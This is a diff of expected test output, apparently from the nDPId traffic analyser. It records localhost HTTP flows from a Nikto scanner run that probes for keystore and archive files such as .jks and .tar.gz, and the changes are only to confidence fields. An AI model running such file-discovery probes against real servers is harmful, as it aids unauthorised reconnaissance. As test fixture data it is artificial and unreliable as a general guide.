{"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":399,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277306,"flow_last_seen":1576420277306,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277306,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50342,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_packet_id":1,"flow_last_seen":1576420277306,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277306,"pkt":"AAAAAAAAAAAAAAAACABFAADBq8lAAEAGkGt\/AAABfwAAAcSmH5B085NqCLeHfoAYAED+tQAAAQEICp1m\/WGdZv1hR0VUIC8xMjcwMC5qa3MgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":399,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277306,"flow_last_seen":1576420277306,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277306,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50342,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":399,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277306,"flow_last_seen":1576420277306,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277306,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50342,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":400,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277307,"flow_last_seen":1576420277307,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277307,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50344,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_packet_id":1,"flow_last_seen":1576420277307,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277307,"pkt":"AAAAAAAAAAAAAAAACABFAADBE+BAAEAGKFV\/AAABfwAAAcSoH5A\/FCtx8eapa4AYAED+tQAAAQEICp1m\/WOdZv1jR0VUIC8xMjcwMC5qa3MgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":400,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277307,"flow_last_seen":1576420277307,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277307,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50344,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":400,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277307,"flow_last_seen":1576420277307,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277307,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50344,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":401,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277308,"flow_last_seen":1576420277308,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277308,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50346,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_packet_id":1,"flow_last_seen":1576420277308,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277308,"pkt":"AAAAAAAAAAAAAAAACABFAADBd5tAAEAGxJl\/AAABfwAAAcSqH5Asxk83LE5RU4AYAED+tQAAAQEICp1m\/WSdZv1kR0VUIC8xMjcwMC5lZ2cgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":401,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277308,"flow_last_seen":1576420277308,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277308,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50346,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":401,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277308,"flow_last_seen":1576420277308,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277308,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50346,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":402,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277309,"flow_last_seen":1576420277309,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277309,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50348,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":402,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_packet_id":1,"flow_last_seen":1576420277309,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277309,"pkt":"AAAAAAAAAAAAAAAACABFAADB9HRAAEAGR8B\/AAABfwAAAcSsH5BlTMzeEpcpJ4AYAED+tQAAAQEICp1m\/WWdZv1lR0VUIC8xMjcwMC5lZ2cgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":402,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277309,"flow_last_seen":1576420277309,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277309,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50348,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":402,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277309,"flow_last_seen":1576420277309,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277309,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50348,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":403,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277310,"flow_last_seen":1576420277310,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277310,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50350,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_packet_id":1,"flow_last_seen":1576420277310,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277310,"pkt":"AAAAAAAAAAAAAAAACABFAADFcQdAAEAGyyl\/AAABfwAAAcSuH5C\/jUmrZ8IhxYAYAED+uQAAAQEICp1m\/WadZv1mR0VUIC8xMjdfMF8wXzEudGFyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":403,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277310,"flow_last_seen":1576420277310,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277310,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50350,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":403,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277310,"flow_last_seen":1576420277310,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277310,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50350,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":404,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277311,"flow_last_seen":1576420277311,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277311,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50352,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_packet_id":1,"flow_last_seen":1576420277311,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277311,"pkt":"AAAAAAAAAAAAAAAACABFAADFdZ1AAEAGxpN\/AAABfwAAAcSwH5BGIE0sZXhTqYAYAED+uQAAAQEICp1m\/WedZv1nR0VUIC8xMjdfMF8wXzEudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277311,"flow_last_seen":1576420277311,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277311,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50352,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277311,"flow_last_seen":1576420277311,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277311,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50352,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":405,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277313,"flow_last_seen":1576420277313,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277313,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50354,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":405,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_packet_id":1,"flow_last_seen":1576420277313,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277313,"pkt":"AAAAAAAAAAAAAAAACABFAADESF9AAEAG89J\/AAABfwAAAcSyH5CXAnDudCS+HoAYAED+uAAAAQEICp1m\/WmdZv1oR0VUIC8xMjcwMC50YXIuZ3ogSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277313,"flow_last_seen":1576420277313,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277313,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50354,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277313,"flow_last_seen":1576420277313,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277313,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50354,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277314,"flow_last_seen":1576420277314,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277314,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50356,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_packet_id":1,"flow_last_seen":1576420277314,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277314,"pkt":"AAAAAAAAAAAAAAAACABFAADEBf5AAEAGNjR\/AAABfwAAAcS0H5ApMj1NA0MOSIAYAED+uAAAAQEICp1m\/WqdZv1qR0VUIC8xMjcwMC50YXIuZ3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277314,"flow_last_seen":1576420277314,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277314,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50356,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
